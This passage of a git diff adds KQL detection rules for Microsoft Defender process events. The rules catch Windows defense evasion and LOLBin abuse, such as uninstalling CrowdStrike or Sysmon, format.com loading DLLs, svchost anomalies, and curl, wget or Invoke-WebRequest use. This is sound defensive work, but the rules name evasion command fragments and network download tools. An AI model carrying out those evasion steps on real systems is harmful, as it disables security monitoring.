+| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql
new file mode 100644
index 00000000..9e3fa150
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon FileSystem Load Attempt By Format.com
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql
new file mode 100644
index 00000000..70c2b25e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Link.EXE Parent Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects an uncommon parent process of "LINK.EXE".
+// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
+// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
+// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
+// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not(((InitiatingProcessFolderPath contains "\\VC\\bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql
new file mode 100644
index 00000000..63a78489
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon One Time Only Scheduled Task At 00:00
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-15
+// Level: high
+// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005
+// False Positives:
+//   - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql b/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql
new file mode 100644
index 00000000..03cd851a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Sigverif.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sigverif.exe" and (not((FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\SysWOW64\\WerFault.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql
new file mode 100644
index 00000000..6f0c33dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Svchost Command Line Parameter
+// Author: Liran Ravich
+// Date: 2025-11-14
+// Level: high
+// Description: Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.
+// This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1036.005, attack.t1055, attack.t1055.012
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not((ProcessCommandLine =~ "" or ProcessCommandLine matches regex "-k\\s\\w{1,64}(\\s?(-p|-s))?" or isnull(ProcessCommandLine)))) and (not(((ProcessCommandLine contains "svchost.exe" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (ProcessCommandLine =~ "svchost.exe" and InitiatingProcessFolderPath endswith "\\MRT.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql
new file mode 100644
index 00000000..1813d0e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Uncommon Svchost Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-08-15
+// Level: medium
+// Description: Detects an uncommon svchost parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql
new file mode 100644
index 00000000..a0645f69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon System Information Discovery Via Wmic.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
+// and GPU driver products/versions.
+// Some of these commands were used by Aurora Stealer in late 2022/early 2023.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql b/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql
new file mode 100644
index 00000000..94bb8041
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Userinit Child Process
+// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
+// Date: 2019-01-12
+// Level: high
+// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence
+// False Positives:
+//   - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql
new file mode 100644
index 00000000..c7808e5d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql
@@ -0,0 +1,12 @@
+// Title: Uninstall Crowdstrike Falcon Sensor
+// Author: frack113
+// Date: 2021-07-12
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql b/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql
new file mode 100644
index 00000000..3589c35f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql
@@ -0,0 +1,12 @@
+// Title: Uninstall Sysinternals Sysmon
+// Author: frack113
+// Date: 2022-01-12
+// Level: high
+// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administrators might use this command to remove Sysmon for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql b/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql
new file mode 100644
index 00000000..d67baf90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Unmount Share Via Net.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2020-10-08
+// Level: low
+// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+// False Positives:
+//   - Administrators or Power users may remove their shares via cmd line
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql
new file mode 100644
index 00000000..bdbe7cfb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql
@@ -0,0 +1,12 @@
+// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-31
+// Level: medium
+// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+// False Positives:
+//   - Installation of unsigned packages for testing purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql b/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql
new file mode 100644
index 00000000..b439e876
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual Child Process of dns.exe
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql
new file mode 100644
index 00000000..0c4781c7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual Parent Process For Cmd.EXE
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-21
+// Level: medium
+// Description: Detects suspicious parent process for cmd.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql
new file mode 100644
index 00000000..4470135b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql
@@ -0,0 +1,12 @@
+// Title: Usage Of Web Request Commands And Cmdlets
+// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql
new file mode 100644
index 00000000..703f96e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql
@@ -0,0 +1,10 @@
+// Title: Use Icacls to Hide File to Everyone
+// Author: frack113
+// Date: 2022-07-18
+// Level: medium
+// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql
new file mode 100644
index 00000000..f9359f4f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql
@@ -0,0 +1,12 @@
+// Title: Use NTFS Short Name in Command Line
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+//   - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql
new file mode 100644
index 00000000..c8eaec20
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql
@@ -0,0 +1,12 @@
+// Title: Use NTFS Short Name in Image
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-06
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+//   - Software Installers
+
+DeviceProcessEvents
+| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql b/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql
new file mode 100644
index 00000000..26f958b5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql
@@ -0,0 +1,13 @@
+// Title: Use of FSharp Interpreters
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-02
+// Level: medium
+// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
+// Both can be used for AWL bypass and to execute F# code via scripts or inline.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate use by a software developer.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_openconsole.kql b/KQL/rules/windows/process_creation/use_of_openconsole.kql
new file mode 100644
index 00000000..fe0deb3a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_openconsole.kql
@@ -0,0 +1,12 @@
+// Title: Use of OpenConsole
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-16
+// Level: medium
+// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate use by an administrator
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql b/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql
new file mode 100644
index 00000000..baaccf74
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql
@@ -0,0 +1,12 @@
+// Title: Use of Pcalua For Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2022-06-14
+// Level: medium
+// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate use by a via a batch script or by an administrator.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_remote_exe.kql b/KQL/rules/windows/process_creation/use_of_remote_exe.kql
new file mode 100644
index 00000000..879e9f91
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_remote_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of Remote.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-02
+// Level: medium
+// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).
+
+DeviceProcessEvents
+| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql b/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql
new file mode 100644
index 00000000..944937e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of Scriptrunner.exe
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+//   - Legitimate use when App-v is deployed
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql
new file mode 100644
index 00000000..416722e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql
@@ -0,0 +1,10 @@
+// Title: Use Of The SFTP.EXE Binary As A LOLBIN
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql b/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql
new file mode 100644
index 00000000..5fe53ce7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of TTDInject.exe
+// Author: frack113
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql b/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql
new file mode 100644
index 00000000..34381a05
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql
@@ -0,0 +1,12 @@
+// Title: Use of UltraVNC Remote Access Software
+// Author: frack113
+// Date: 2022-10-02
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "VNCViewer" or ProcessVersionInfoProductName =~ "UltraVNC VNCViewer" or ProcessVersionInfoCompanyName =~ "UltraVNC" or ProcessVersionInfoOriginalFileName =~ "VNCViewer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql b/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql
new file mode 100644
index 00000000..96eafd5f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of VisualUiaVerifyNative.exe
